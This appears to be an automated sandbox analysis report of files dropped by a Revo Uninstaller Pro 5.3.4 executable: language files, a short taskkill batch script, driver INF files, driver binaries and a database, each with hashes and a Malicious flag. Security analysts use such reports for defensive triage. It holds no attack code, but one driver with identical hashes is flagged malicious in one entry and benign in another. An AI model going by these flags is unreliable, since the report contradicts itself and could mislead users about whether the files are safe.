                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.l.o.v.e.n.a...i.n.a./.S.l.o.v.e.n.i.a.n.....W.e.b.L.a.n.g.=.S.I.....T.r.a.n.s.l.a.t.o.r.=.V.i.n.k.o. .K.a.s.t.e.l.i.c.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .P.o.g.l.e.d.....1.0.3. .=. .N.a.s.t.a.v.i.t.v.e.....1.0.4. .=. .O.d.s.t.r.a.n.j.e.v.a.l.n.i.k.....1.0.5. .=. .O.r.o.d.j.a.....1.0.6. .=. .L.o.v.e.c. .....1.0.7. .=. .S.e.z.n.a.m.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .P.o.d.r.o.b.n.o.s.t.i.....1.1.0. .=. .O.d.s.t.r.a.n.i.....1.1.1. .=. .O.d.s.t.r.a.n.i. .v.n.o.s.....1.1.2. .=. .O.s.v.e.~.i.....1.1.3. .=. .S.t.e. .p.r.e.p.r.i...a.n.i.,. .d.a. .~.e.l.i.t.e. .o.d.s.t.r.a.n.i.t.i. .i.z.b.r.a.n.i. .v.n.o.s.?.....1.1.4. .=. .S.t.e. .p.r.e.p.r.i...a.n.i.,. .d.a. .~.e.l.i.t.e. .o.d.s.t.r.a.n.i.t.i. .i.z.b.r.a.n.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (619), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):135850
                                                                                                                                                                          Entropy (8bit):3.4417582346095577
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:lo6exv60KMuKMJ3XUvR7kcuKO+1vWbNPD5Etnx7qVwF/Z4DeTO9fMLp/GAwljIeK:axS0RuKMqR7kcuy1vWbUd/GV+Lbfn
                                                                                                                                                                          MD5:AC710839BFC0EB302C8CB6A5194E1B6F
                                                                                                                                                                          SHA1:7721A6CC3C22585ACF111F53C426FC0AF6602000
                                                                                                                                                                          SHA-256:E88253ECC79EC3E528BD2ACCF23181830C06CA09F1912CAB6CE0E3C6A903AFBA
                                                                                                                                                                          SHA-512:9E91C669A51F9EE1594F245774DD674FBE78CA8115F9EE8B07038C5D0DF505DBB016746332D25DA8943A026967ADEE0233448C352E89C58207BB959C9C9C0A2D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.s.p.a...o.l./.S.p.a.n.i.s.h.....W.e.b.L.a.n.g.=.E.S.P.....T.r.a.n.s.l.a.t.o.r.=.J.o.s.e. .L.u.i.s. .V.i.l.l.a.l.b.a. .S.a.n.c.h.e.z.,. .F.e.r.n.a.n.d.o. .G.r.e.g.o.i.r.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.c.i.o.n.e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .H.e.r.r.a.m.i.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .S.i.l.e.n.c.i.o.s.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.o.s.....1.0.9. .=. .D.e.t.a.l.l.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r.....1.1.1. .=. .Q.u.i.t.a.r. .E.n.t.r.a.d.a.....1.1.2. .=. .R.e.f.r.e.s.c.a.r.....1.1.3. .=. ...E.s.t... .s.e.g.u.r.o. .d.e. .q.u.e. .d.e.s.e.a. .q.u.i.t.a.r. .l.a. .e.n.t.r.a.d.a. .s.e.l.e.c.c.i.o.n.a.d.a.?.....1.1.4. .
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (767), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):128354
                                                                                                                                                                          Entropy (8bit):3.480986127025453
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:7aptCikJrEmw4kK/D9YyhsiJNWFjNSj6VDJzwgCo:7aV
                                                                                                                                                                          MD5:BCDE611DC4AAD7E214456CAFAB8FD146
                                                                                                                                                                          SHA1:7E2865DDC57F0CC9EC4BC396808E79F90048D3C2
                                                                                                                                                                          SHA-256:014A98FE1ED05D74C4BB37BC23295D318A827CA9ED140EB0D4824AB13B932327
                                                                                                                                                                          SHA-512:EA2F7202A8F51E10E30F18465C5732E56AEEA81E3F90FBA53D865D8DB5D0551473A9A76E21A81931A506CACE484960A180A45E3197CDBAE59987F516E2B5EB81
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.v.e.n.s.k.a./.S.w.e.d.i.s.h.....W.e.b.L.a.n.g.=.S.W.E.....T.r.a.n.s.l.a.t.o.r.=.1.F.F.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.n.i.n.g.....1.0.3. .=. .A.l.t.e.r.n.a.t.i.v.....1.0.4. .=. .A.v.i.n.s.t.a.l.l.e.r.a.r.e.....1.0.5. .=. .V.e.r.k.t.y.g.....1.0.6. .=. .J.a.k.t.l...g.e.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.v.i.n.s.t.a.l.l.e.r.a.....1.1.1. .=. .T.a. .b.o.r.t. .p.o.s.t.....1.1.2. .=. .U.p.p.d.a.t.e.r.a.....1.1.3. .=. ...r. .d.e.t. .s...k.e.r.t. .a.t.t. .d.u. .v.i.l.l. .t.a. .b.o.r.t. .d.e.n. .v.a.l.d.a. .p.o.s.t.e.n.?.....1.1.4. .=. ...r. .d.e.t. .s...k.e.r.t. .a.t.t. .d.u. .v.i.l.l. .a.v.i.n.s.t.a.l.l.e.r.a. .d.e.t. .v.a.l.d.a. .p.r.o.g.r.a.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (583), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):106396
                                                                                                                                                                          Entropy (8bit):4.270018902460138
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:xR071uEADs98s2u4xu/7NoNQdyYEzFVI/2o9xrfln+R47G/LbWdE0wbmw1hCtumE:8398sgaUBFGP61wE
                                                                                                                                                                          MD5:BA844724649201A288754E2F55838ED2
                                                                                                                                                                          SHA1:F332C9A6022F567CF6A6F69200E1CD18FB125663
                                                                                                                                                                          SHA-256:2D78A79A7EEE659D0BCB0F1DA0E4D9EE8209C6A6DA0A6965E93C409902495E4D
                                                                                                                                                                          SHA-512:5917CEC00A8C81AE33AA6371E78422D95005D4796BB10E079F198E2F0B254272518A87D1C07E2DC7D4BF308F8D74C354176A6F03DC6CD4DC71D7B6F932267B24
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .2.).2.D..."./.T.h.a.i.....W.e.b.L.a.n.g. .=. .T.H.A.I.....T.r.a.n.s.l.a.t.o.r. .=. .P.o.r.n.c.h.a.i. .P.e.t.t.h.a.v.e.e.p.o.r.n.d.e.j.....C.o.d.e.p.a.g.e. .=. .U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.4...4...2.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...9.....1.0.3. .=. ...1.'.@.%.7.-.......1.0.4. .=. .B...#.A...#.!...-.....2.#...4.....1.I.......1.0.5. .=. .@...#.7.H.-...!.7.-.....1.0.6. .=. .B.+.!.....1...@...-.#.L.....1.0.7. .=. .#.2."...2.#.....1.0.8. .=. .D.-...-.......1.0.9. .=. .#.2.".%.0.@.-.5.".......1.1.0. .=. ...-.....2.#...4.....1.I.......1.1.1. .=. .%...#.2."...2.#.....1.1.2. .=. .#.5.@...#.......1.1.3. .=. ...8...A...H.C...+.#.7.-.D.!.H.'.H.2...8.....I.-.....2.#.%...#.2."...2.#...5.H.@.%.7.-...?.....1.1.4. .=. ...8...A...H.C...+.#.7.-.D.!.H.'.H.2...I.-.....2.#...-.....2.#.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (304), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):59906
                                                                                                                                                                          Entropy (8bit):5.771309245234147
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:a1OmlKWIJw+wqYqn4wi7zv+vHj2gmoNus:o+wUY8W7zv+vHjlF
                                                                                                                                                                          MD5:FEE3AE3394835522278A93B0BC0D90DE
                                                                                                                                                                          SHA1:0E6E9CD7778E39B04CFC0360C8EEB3F96ADC7146
                                                                                                                                                                          SHA-256:8EC726AE49EA372C038E275B034C0CD4DD71F12E4DDC426701A89F889F9AE804
                                                                                                                                                                          SHA-512:F506246F3583B5D1E72F2FE5128D7CA17D8E2C5A75ABF522DCCA25622F84B672CE6C40EDFE945BDADF0C7B1B6C9BA1D9F8BB7985760E40AAB12BC23BC4BFAF3E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .A~.-N.e ./. .T.r.a.d.i.t.i.o.n.a.l. .C.h.i.n.e.s.e.....W.e.b.L.a.n.g.=. .T.C.H.....T.r.a.n.s.l.a.t.o.r.=. .T.o.m.m.y. .C.h.e.n.,. .t.o.n.y.y.u.2.7.,. .K.e.v.i.n.Y.u.0.5.0.4.....C.o.d.e.p.a.g.e.=. .U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=. .5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ..j......1.0.3. .=. .x.......1.0.4. .=. ..yd..{.t.T....1.0.5. .=. .vQ.[.]wQ....1.0.6. .=. .us.N!j._....1.0.7. .=. ..n.U....1.0.8. .=. ..W:y....1.0.9. .=. .s.0}..e....1.1.0. .=. ..yd..[.....1.1.1. .=. ..yd....v....1.1.2. .=. ...ete.t....1.1.3. .=. ..`/f&T.x.....yd.x..S.v...v?.....1.1.4. .=. ..`/f&T.x.....yd..[.x..S.v.z._?.....1.1.5. .=. ...R.f.e....1.1.6. .=. ....f....1.1.7. .=. ..vMR.]wQ...f..........1.1.8. .=. ..}.z..........1.1.9. .=. ...e..........1.2.0. .=. ..`&N^..|q}.{.t.T!.....1.2.1. .=. ..`
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (656), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):129774
                                                                                                                                                                          Entropy (8bit):3.6427799288392415
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:WZh0Mg04blwiRK6nWBgUwSnYE77SlqvRUy+2JykmAwT/WBGSBvO3PhC7CSfq3vb9:N+xDOMjRdno
                                                                                                                                                                          MD5:150B402E0D5419C483B36AF4EC6D870C
                                                                                                                                                                          SHA1:E1706E77AE988807AA60DE2BD028846B77543DB5
                                                                                                                                                                          SHA-256:36C3A2CC9AAD2C03C81FB049765E5352A3BFE7CC65F462ECB4A24F9961A1CA3E
                                                                                                                                                                          SHA-512:D4DF88863D41CE9A92725915BAAD6CD9B725F808CD00B300DFBA69A6A22A2C3984519AE9F05D376EF30053A8DD2D74A19567C295203E1F529D621C3702AF8BA9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.T...r.k...e./.T.u.r.k.i.s.h.....W.e.b.L.a.n.g.=.T.R.....T.r.a.n.s.l.a.t.o.r.=.K.a.y.a. .Z.e.r.e.n. .t.r.a.n.s.l.a.t.o.r.@.z.e.r.o.n...n.e.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .G...r...n...m.....1.0.3. .=. .A.y.a.r.l.a.r.....1.0.4. .=. .K.a.l.d.1.r.1.c.1.....1.0.5. .=. .A.r.a...l.a.r.....1.0.6. .=. .A.v.c.1. .k.i.p.i.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .S.i.m.g.e.l.e.r.....1.0.9. .=. .A.y.r.1.n.t.1.l.a.r.....1.1.0. .=. .K.a.l.d.1.r.....1.1.1. .=. .K.a.y.1.d.1. .k.a.l.d.1.r.....1.1.2. .=. .Y.e.n.i.l.e.....1.1.3. .=. .S.e...i.l.m.i._. .k.a.y.d.1. .k.a.l.d.1.r.m.a.k. .i.s.t.e.d.i...i.n.i.z.e. .e.m.i.n. .m.i.s.i.n.i.z.?.....1.1.4. .=. .S.e...i.l.m.i._. .u.y.g.u.l.a.m.a.y.1. .k.a.l.d.1.r.m.a.k. .i.s.t.e.d.i...
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (641), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):131462
                                                                                                                                                                          Entropy (8bit):4.006598591595778
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:bQUlrmrvEWUtL3EgNSp/7IAu821YhLxg2YS/:bQUlr0vG3TSp/7IAu82uhLd
                                                                                                                                                                          MD5:2B18F02BB760F19F344D567B0C671EA8
                                                                                                                                                                          SHA1:79BEC0F51098B51A90F63DA05CEBC8FBE560B556
                                                                                                                                                                          SHA-256:71C9B4A2712ACD913EEE9FDF4178E344CD6AF79915CA01AC9FFBD6A797B096EA
                                                                                                                                                                          SHA-512:55BEEDE938831AE93DBBE34C946AFE3C13EB0F670974DECA3275C2D431581C8D689703807E88CA28E483234CFD6C025B912EACCD8F645E3C9B409CC7CFA9950E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .#.:.@.0.W.=.A.L.:.0./.U.k.r.a.i.n.i.a.n.....W.e.b.L.a.n.g.=.U.K.R.....T.r.a.n.s.l.a.t.o.r.=.A.l.e.x.e.y. .L.u.g.i.n. .-. .a.l.e.x.e.y.l.u.g.i.n.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...8.3.;.O.4.....1.0.3. .=. ...0.;.0.H.B.C.2.0.=.=.O. .....1.0.4. .=. ...5.V.=.A.B.0.;.O.B.>.@. .....1.0.5. .=. ...=.A.B.@.C.<.5.=.B.8. .....1.0.6. .=. . .5.6.8.<. .?.>.;.N.2.0.=.=.O. .....1.0.7. .=. .!.?.8.A.>.:. .....1.0.8. .=. ...V.:.B.>.3.@.0.<.8. .....1.0.9. .=. ...5.B.0.;.V. .....1.1.0. .=. ...5.V.=.A.B.0.;.O.F.V.O. .....1.1.1. .=. ...8.4.0.;.8.B.8. .5.;.5.<.5.=.B. .....1.1.2. .=. ...=.>.2.8.B.8. .....1.1.3. .=. ...8.4.0.;.8.B.8. .2.8.1.@.0.=.8.9. .5.;.5.<.5.=.B.?. .....1.1.4. .=. ...5.V.=.A.B.0.;.N.2.0.B.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (551), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):121866
                                                                                                                                                                          Entropy (8bit):4.039495906761851
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:lo4utFqYH2EX12i3SK0ZGjiuh1AjBVXstShQY6vbCXWpvXZnZtjAkussDj/5k0l1:Wii3SxojNuXs2KB82gEWNqu
                                                                                                                                                                          MD5:3496F90CD98263718552E231F2605E67
                                                                                                                                                                          SHA1:5BA4DCC61A461C6F3575377B38AEEA3913BB3BD9
                                                                                                                                                                          SHA-256:17DA614E8B8ACE89547B561BDE7B15EFEEEDA09B12A6D79DD1679B7A66D8D207
                                                                                                                                                                          SHA-512:214C2146FA1C577A4414E1BA8E45C75115CCDF06F7377A830E82C32B4D0F4933F4A237433536DCB78E1E93145C85BAFDB3D217A7EB7420960532C081B58F29CD
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.T.i...n.g. .V.i...t./.V.i.e.t.n.a.m.e.s.e. .....W.e.b.L.a.n.g.=.V.N.....T.r.a.n.s.l.a.t.o.r.=. .....n.g. .T.r...n. .L... .A.n.h.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .H.i...n. .t.h.......1.0.3. .=. .T...y. .c.h...n.....1.0.4. .=. .G... .b.......1.0.5. .=. .C...n.g. .c.......1.0.6. .=. .C.h... ..... .t.r.u.y. .t...m.....1.0.7. .=. .D.a.n.h. .s...c.h.....1.0.8. .=. .B.i...u. .t.....n.g.....1.0.9. .=. .C.h.i. .t.i...t.....1.1.0. .=. .G... .b.......1.1.1. .=. .X.o...a. .t.r.o.n.g. .r.e.g.i.s.t.r.y.....1.1.2. .=. .L...m. .m...i.....1.1.3. .=. .B...n. .c... .m.u...n. .g... .r.e.g.i.s.t.r.y. .....i. .t.....n.g. ..... .c.h...n.?.....1.1.4. .=. .B...n. .c... .m.u...n. .g... .p.h...n. .m...m. ..... .c.h...n.?.....1.1.5. .
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):88
                                                                                                                                                                          Entropy (8bit):4.6625095008025434
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:nVN2kLnCvvEOVtqvepJQjkX3TAX:nvxrCvvEOPqvewwX8X
                                                                                                                                                                          MD5:85F8F277D3AB3F45C089C0B81116D85E
                                                                                                                                                                          SHA1:9D3106AE997DB2F449894446B296C5A14EC20E91
                                                                                                                                                                          SHA-256:6E6B62366A433BF575E72582FA7690C7B7901945B9C138F177FE657F00D77B3C
                                                                                                                                                                          SHA-512:C5A05526A1DF5A6E1B9F5E1DA9E602C78F87C4B189ECFB61BF8407BDD6B5316EE866435F1D70086A2601DFD40C90FA5B1DB12D1C1E51DE9BA2F7174306AC1276
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:taskkill /IM RevoUninPro.exe /F..taskkill /IM ruplp.exe /F.."%~dp0\ruplp.exe" /regserver
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                          Entropy (8bit):6.303083119559888
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                                                          MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                                                          SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                                                          SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                                                          SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Windows setup INFormation
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2444
                                                                                                                                                                          Entropy (8bit):4.986959697467434
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                                                          MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                                                          SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                                                          SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                                                          SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DestinationDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Windows setup INFormation
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2444
                                                                                                                                                                          Entropy (8bit):4.986959697467434
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                                                          MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                                                          SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                                                          SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                                                          SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DestinationDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                          Entropy (8bit):6.303083119559888
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                                                          MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                                                          SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                                                          SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                                                          SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3007016, page size 1024, file counter 53475, database pages 19288, 1st free page 14928, free pages 4, cookie 0x5f, schema 1, UTF-8, version-valid-for 53475
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):19750912
                                                                                                                                                                          Entropy (8bit):5.916143535151713
                                                                                                                                                                          Encrypted:false
